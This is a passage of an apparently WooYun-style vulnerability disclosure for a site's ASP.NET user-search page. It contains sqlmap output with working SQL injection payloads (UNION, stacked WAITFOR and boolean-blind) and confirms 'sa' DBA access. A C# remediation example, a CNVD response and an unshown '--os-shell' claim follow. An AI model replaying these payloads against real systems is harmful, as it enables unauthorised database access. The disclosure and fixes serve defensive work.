[02:04:58] [INFO] testing for SQL injection on POST parameter 'btnSearchUser.x'
[02:04:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:04:59] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[02:05:01] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:05:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[02:05:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[02:05:03] [INFO] testing 'Generic UNION query (58) - 1 to 10 columns'
[02:05:30] [WARNING] POST parameter 'btnSearchUser.x' is not injectable
[02:05:30] [INFO] testing if POST parameter 'btnSearchUser.y' is dynamic
[02:05:30] [WARNING] POST parameter 'btnSearchUser.y' does not appear dynamic
[02:05:31] [WARNING] heuristic (basic) test shows that POST parameter 'btnSearch
User.y' might not be injectable
[02:05:31] [INFO] testing for SQL injection on POST parameter 'btnSearchUser.y'
[02:05:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:05:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[02:05:33] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:05:33] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[02:05:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[02:05:35] [INFO] testing 'Generic UNION query (58) - 1 to 10 columns'
[02:06:03] [WARNING] POST parameter 'btnSearchUser.y' is not injectable
sqlmap identified the following injection points with a total of 594 HTTP(s) req
uests:
---
Place: POST
Parameter: txtSearchUser
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwULLTE1OTg5MDYxOTYPZBYCAgMPZBYGAgcPEA8WBh4NRGF0YVR
leHRGaWVsZAUIVXNlck5hbWUeDkRhdGFWYWx1ZUZpZWxkBQZVc2VySUQeC18hRGF0YUJvdW5kZ2QQFQQ
Gd2RyMTIzB21pYW8xMjMLcGFubWluZzEyMzELcGVpbGluZzEyNTgVBAE5AjE0AjM2AjM5FCsDBGdnZ2c
WAWZkAgkPEA8WBh8ABQ5Nb2R1bGVUeXBlTmFtZR8BBQxNb2R1bGVUeXBlSUQfAmdkEBUFDOebtOaSree
uoeeQhgzngrnmkq3nrqHnkIYM5p2D6ZmQ566h55CGDOezu+e7n+euoeeQhgznlKjmiLfnrqHnkIYVBQE
1ATQBMwEyATEUKwMFZ2dnZ2cWAWZkAgsPPCsADQBkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2t
LZXlfXxYBBQ1idG5TZWFyY2hVc2VyBQpNb2R1bGVMaXN0D2dk+xNkZaqJ2CB9tm9KuBIYYBJrbQ4=&__
EVENTVALIDATION=/wEWDAK/wfuSBgL3+7WiDgLIvLpRAqyliowMArSl+o8MAral8o8MAralpowMAt78
kaQCAtn8kaQCAtj8kaQCAtv8kaQCAtr8kaQCE6GHT/1b7g7aGY4ZEaR7/b3if+I=&txtSearchUser=1
2%' AND 1607=1607 AND '%'='&ModuleTypeList=5&btnSearchUser.x=8&btnSearchUser.y=4
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: __VIEWSTATE=/wEPDwULLTE1OTg5MDYxOTYPZBYCAgMPZBYGAgcPEA8WBh4NRGF0YVR
leHRGaWVsZAUIVXNlck5hbWUeDkRhdGFWYWx1ZUZpZWxkBQZVc2VySUQeC18hRGF0YUJvdW5kZ2QQFQQ
Gd2RyMTIzB21pYW8xMjMLcGFubWluZzEyMzELcGVpbGluZzEyNTgVBAE5AjE0AjM2AjM5FCsDBGdnZ2c
WAWZkAgkPEA8WBh8ABQ5Nb2R1bGVUeXBlTmFtZR8BBQxNb2R1bGVUeXBlSUQfAmdkEBUFDOebtOaSree
uoeeQhgzngrnmkq3nrqHnkIYM5p2D6ZmQ566h55CGDOezu+e7n+euoeeQhgznlKjmiLfnrqHnkIYVBQE
1ATQBMwEyATEUKwMFZ2dnZ2cWAWZkAgsPPCsADQBkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2t
LZXlfXxYBBQ1idG5TZWFyY2hVc2VyBQpNb2R1bGVMaXN0D2dk+xNkZaqJ2CB9tm9KuBIYYBJrbQ4=&__
EVENTVALIDATION=/wEWDAK/wfuSBgL3+7WiDgLIvLpRAqyliowMArSl+o8MAral8o8MAralpowMAt78
kaQCAtn8kaQCAtj8kaQCAtv8kaQCAtr8kaQCE6GHT/1b7g7aGY4ZEaR7/b3if+I=&txtSearchUser=1
2%' UNION ALL SELECT NULL,CHAR(113)+CHAR(115)+CHAR(109)+CHAR(114)+CHAR(113)+CHAR
(83)+CHAR(97)+CHAR(118)+CHAR(117)+CHAR(71)+CHAR(103)+CHAR(67)+CHAR(85)+CHAR(79)+
CHAR(70)+CHAR(113)+CHAR(101)+CHAR(101)+CHAR(121)+CHAR(113),NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL,NULL,NULL-- &ModuleTypeList=5&btnSearchUser.x=8&btnSearchUser
.y=4
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwULLTE1OTg5MDYxOTYPZBYCAgMPZBYGAgcPEA8WBh4NRGF0YVR
leHRGaWVsZAUIVXNlck5hbWUeDkRhdGFWYWx1ZUZpZWxkBQZVc2VySUQeC18hRGF0YUJvdW5kZ2QQFQQ
Gd2RyMTIzB21pYW8xMjMLcGFubWluZzEyMzELcGVpbGluZzEyNTgVBAE5AjE0AjM2AjM5FCsDBGdnZ2c
WAWZkAgkPEA8WBh8ABQ5Nb2R1bGVUeXBlTmFtZR8BBQxNb2R1bGVUeXBlSUQfAmdkEBUFDOebtOaSree
uoeeQhgzngrnmkq3nrqHnkIYM5p2D6ZmQ566h55CGDOezu+e7n+euoeeQhgznlKjmiLfnrqHnkIYVBQE
1ATQBMwEyATEUKwMFZ2dnZ2cWAWZkAgsPPCsADQBkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2t
LZXlfXxYBBQ1idG5TZWFyY2hVc2VyBQpNb2R1bGVMaXN0D2dk+xNkZaqJ2CB9tm9KuBIYYBJrbQ4=&__
EVENTVALIDATION=/wEWDAK/wfuSBgL3+7WiDgLIvLpRAqyliowMArSl+o8MAral8o8MAralpowMAt78
kaQCAtn8kaQCAtj8kaQCAtv8kaQCAtr8kaQCE6GHT/1b7g7aGY4ZEaR7/b3if+I=&txtSearchUser=1
2%'; WAITFOR DELAY '0:0:5'--&ModuleTypeList=5&btnSearchUser.x=8&btnSearchUser.y=
4
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwULLTE1OTg5MDYxOTYPZBYCAgMPZBYGAgcPEA8WBh4NRGF0YVR
leHRGaWVsZAUIVXNlck5hbWUeDkRhdGFWYWx1ZUZpZWxkBQZVc2VySUQeC18hRGF0YUJvdW5kZ2QQFQQ
Gd2RyMTIzB21pYW8xMjMLcGFubWluZzEyMzELcGVpbGluZzEyNTgVBAE5AjE0AjM2AjM5FCsDBGdnZ2c
WAWZkAgkPEA8WBh8ABQ5Nb2R1bGVUeXBlTmFtZR8BBQxNb2R1bGVUeXBlSUQfAmdkEBUFDOebtOaSree
uoeeQhgzngrnmkq3nrqHnkIYM5p2D6ZmQ566h55CGDOezu+e7n+euoeeQhgznlKjmiLfnrqHnkIYVBQE
1ATQBMwEyATEUKwMFZ2dnZ2cWAWZkAgsPPCsADQBkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2t
LZXlfXxYBBQ1idG5TZWFyY2hVc2VyBQpNb2R1bGVMaXN0D2dk+xNkZaqJ2CB9tm9KuBIYYBJrbQ4=&__
EVENTVALIDATION=/wEWDAK/wfuSBgL3+7WiDgLIvLpRAqyliowMArSl+o8MAral8o8MAralpowMAt78
kaQCAtn8kaQCAtj8kaQCAtv8kaQCAtr8kaQCE6GHT/1b7g7aGY4ZEaR7/b3if+I=&txtSearchUser=1
2%' WAITFOR DELAY '0:0:5'--&ModuleTypeList=5&btnSearchUser.x=8&btnSearchUser.y=4
---
[02:06:03] [INFO] testing Microsoft SQL Server
[02:06:04] [INFO] confirming Microsoft SQL Server
[02:06:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[02:06:04] [INFO] fetching current user
current user: 'sa'
[02:06:04] [INFO] fetching current database
current database: 'GenMedia'
[02:06:05] [INFO] testing if current user is DBA
current user is DBA: True

Proof of vulnerability:

As above

Fix recommendation:

Filter the input
Restrict privileges
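The two fixes above, shown in code. This is an added example, not code from the original report or from the GenMedia application: the "before" query reconstructs what a search handler like the one behind frmGrantUser.aspx evidently does (the `12%' ...--` payloads in the sqlmap output only work if the search term is spliced into a quoted LIKE pattern), and the "after" form passes the term as a typed parameter, escapes LIKE wildcards, and connects with a dedicated low-privilege login instead of `sa`. The table and column names (`Users`, `UserID`, `UserName`), the login name `genmedia_app`, and the connection string are assumptions; the page does not show the schema.

```csharp
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.SqlClient;

// Added example, not the GenMedia project's code. Schema and login names are assumed.
public static class UserSearch
{
    // BEFORE (input filtering missing): the search term is concatenated into a
    // LIKE pattern. A value such as   12%' UNION ALL SELECT ...--   closes the
    // quote and appends its own statement, which is exactly what the sqlmap
    // payloads on this page do. Stacked queries (the "; WAITFOR DELAY" payload)
    // work for the same reason.
    public static string BuildVulnerableQuery(string txtSearchUser)
    {
        return "SELECT UserID, UserName FROM Users WHERE UserName LIKE '%"
               + txtSearchUser + "%'";
    }

    // LIKE metacharacters are escaped so that a "%" or "_" typed by the user
    // matches literally instead of widening the search. "[" is escaped first,
    // because the other replacements introduce brackets of their own.
    public static string EscapeLikePattern(string input)
    {
        return input.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
    }

    // AFTER (input filtering): the value travels as a typed, length-limited
    // parameter, so quote characters inside it can never become SQL syntax.
    public static List<KeyValuePair<int, string>> SearchUsers(string connectionString,
                                                              string txtSearchUser)
    {
        var results = new List<KeyValuePair<int, string>>();
        const string sql =
            "SELECT UserID, UserName FROM Users WHERE UserName LIKE @pattern";

        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            // 100 characters of search term plus the two surrounding wildcards.
            cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 102).Value =
                "%" + EscapeLikePattern(txtSearchUser ?? string.Empty) + "%";
            conn.Open();
            using (SqlDataReader reader = cmd.ExecuteReader())
            {
                while (reader.Read())
                {
                    results.Add(new KeyValuePair<int, string>(
                        reader.GetInt32(0), reader.GetString(1)));
                }
            }
        }
        return results;
    }

    // AFTER (privilege control): the application connects as a dedicated login
    // that holds only the rights the search needs, never as 'sa'. Server name
    // and password are placeholders (constructed example). On the database side
    // the login is created with, for instance:
    //   CREATE LOGIN genmedia_app WITH PASSWORD = '<placeholder>';
    //   CREATE USER genmedia_app FOR LOGIN genmedia_app;
    //   GRANT SELECT ON dbo.Users TO genmedia_app;
    public const string ExampleConnectionString =
        "Server=DBHOST;Database=GenMedia;User Id=genmedia_app;Password=<placeholder>;";
}
```

Even with parameterised queries, the `--os-shell` result on this page depends on the `sa` login and on `xp_cmdshell` being reachable; with the application running as `genmedia_app`, a residual injection could at most read the tables that login was granted, and `EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;` removes the command-execution path on the server itself.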

Copyright notice: when reposting, please credit the source, 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed at: 2015-09-06 08:53

Vendor reply:

CNVD has confirmed and reproduced the described situation; it has been forwarded via CNCERT to the Jiangsu branch center, which will coordinate handling with the site's operating unit.

Latest status:

None yet